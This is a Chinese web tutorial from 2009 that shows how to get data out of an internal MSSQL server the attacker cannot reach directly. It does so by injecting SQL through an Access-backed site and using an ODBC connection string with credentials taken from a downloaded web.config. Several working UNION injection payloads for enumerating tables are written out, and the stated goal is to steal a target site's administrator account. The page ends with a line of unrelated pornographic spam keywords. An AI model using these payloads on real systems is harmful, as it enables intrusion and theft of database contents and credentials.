當(dāng)前位置 : 首頁>軟件學(xué)院>網(wǎng)絡(luò)技術(shù)>黑客攻防>正文

看黑客通過Access來獲取MSSQL數(shù)據(jù)

http://www.yibo1263.com　2009-3-30 7:54:35 　來源:東北IT網(wǎng) 　編輯:葉子

　　首先說明一點(diǎn)，這個(gè)方法很早就有了，不過用時(shí)大概在腦袋里沉寂太久，已經(jīng)處于忘卻狀態(tài)。感謝Trace提供資料。經(jīng)常會(huì)遇到任意文件下載漏洞,一般處理的方法是把數(shù)據(jù)庫連接文件下載回來,然后遠(yuǎn)程連接上。

　　首先說明一點(diǎn)，這個(gè)方法很早就有了，不過用時(shí)大概在腦袋里沉寂太久，已經(jīng)處于忘卻狀態(tài)。感謝Trace提供資料。

　　經(jīng)常會(huì)遇到任意文件下載漏洞，一般處理的方法是把數(shù)據(jù)庫連接文件下載回來,然后遠(yuǎn)程連接上去。最理想的狀態(tài)莫過于MSSQL和MYSQL，尤其是在數(shù)據(jù)庫和WEB不分離的情況下，備分SHELL，導(dǎo)出SHELL，可以用的方法很多。

　　不過要是數(shù)據(jù)庫和WEB分離，而且數(shù)據(jù)庫在內(nèi)網(wǎng)不可上網(wǎng)，或者有防火墻等等其他手段使得我們無法連上遠(yuǎn)程數(shù)據(jù)庫時(shí)，不妨假設(shè)的再艱難一些，甚至無法找到一個(gè)mssql注射點(diǎn)時(shí)，很多情況下通常會(huì)束手無策。

　　這里以 MSSQL為例子，很湊巧找到一個(gè)任意文件下載漏洞，直接下了WEB.CONFIG回來看，發(fā)現(xiàn)數(shù)據(jù)庫在內(nèi)網(wǎng)，找了半天沒找到注射點(diǎn)，稍微旁注一下，有一個(gè)站，可惜是ACCESS數(shù)據(jù)庫。猜不到表和后臺(tái)。不過目標(biāo)站的后臺(tái)是知道的，然后準(zhǔn)備從這個(gè)access注射點(diǎn)讀出目標(biāo)站管理員帳戶。直觀一些，下面直接給出我本地測(cè)試結(jié)果：

　　

　　弄的簡(jiǎn)單一點(diǎn)，就3個(gè)字段，ID，XM，XB，ID數(shù)字型，后面2個(gè)字符型。

　　假設(shè)存在漏洞的文件中，執(zhí)行SQL語句 select * from test whrere id = 1

　　這里有3個(gè)字段，我們用UNION聯(lián)合查詢給他匹配一下就是（黑盒操作時(shí)用order by 或者窮舉來確定字段個(gè)數(shù)）

　　SELECT * FROM test where id=999999 union Select top 1 1,2,name from [ODBC;Driver=SQL Server;UID=dbo;PWD=dba;Server=*****;DataBase=master].ku

　　這里的master庫中我建立了一個(gè)名為KU的表，上面這個(gè)查詢語句中，由于id=999999不存在，在聯(lián)合查詢的作用下，web上原本顯示access數(shù)據(jù)庫內(nèi)容的位置顯示出了我們構(gòu)造的UNION查詢結(jié)果，name字段處于一個(gè)字符型的顯示位置。

　　

　　ku這個(gè)表里的name字段內(nèi)容就會(huì)被顯示在web上相應(yīng)的位置，不過這個(gè)顯然不是我們想要的，我們要的是整個(gè)表的結(jié)構(gòu)和內(nèi)容

　　以master為例子，這里是模擬的結(jié)果，事先我已經(jīng)知道m(xù)aster的結(jié)構(gòu),待會(huì)方便和結(jié)果比對(duì)校驗(yàn)是否有錯(cuò)。

　　

　　SELECT * FROM test where id=999999 union Select top 1 1,2,table_name from [ODBC;Driver=SQL Server;UID=dbo;PWD=dba;Server=*****;DataBase=master].information_schema.tables

　　這樣master庫的第一個(gè)表名就出來了。

　　

　　獲得后面的表名也很簡(jiǎn)單。

　　SELECT * FROM test where id=999999 union Select top 1 1,2,table_name from [ODBC;Driver=SQL Server;UID=dbo;PWD=dba;Server=*****;DataBase=master].information_schema.tables where table_name not in (select top 1 table_name from [ODBC;Driver=SQL Server;UID=dbo;PWD=dba;Server=****;DataBase=master].information_schema.tables)

　　

　　以次類以常規(guī)方法推取得字段名和字段內(nèi)容,代碼煩瑣自行研究下。

　　如果數(shù)據(jù)庫里的ID是字符型，則

　　SELECT * FROM test where id='999999' union Select top 1 1,2,table_name from [ODBC;Driver=SQL Server;UID=dbo;PWD=dba;Server=***;DataBase=master].information_schema.tables where '1'='1'

【收藏】【打印】【進(jìn)入論壇】

相關(guān)文章：

·黑客必備武器之NC網(wǎng)絡(luò)軍刀

·黑客網(wǎng)站負(fù)責(zé)人因培訓(xùn)黑客技術(shù)入獄

·荷蘭釋放支持維基解密19歲黑客

·澳洲17歲中學(xué)生黑掉Twitter

·WordPress站遭黑客攻擊的解決步驟

·黑客利用病毒改高考分每科4000元

·黑客回應(yīng)AT&T 所有iPad都存在安全隱患

·普通文件也能成為黑客入侵的手段

·熊貓燒香制造者李俊：黑客是一種榮耀

·全球黑客大賽戰(zhàn)況：iPhone 20秒被黑

·黑客技術(shù)：ICMP洪水攻擊淺析

亚洲AV无码乱码在线观看不卡|最新大伊香蕉精品视频在线|亚洲不卡av一区二区|国产美女无遮挡免费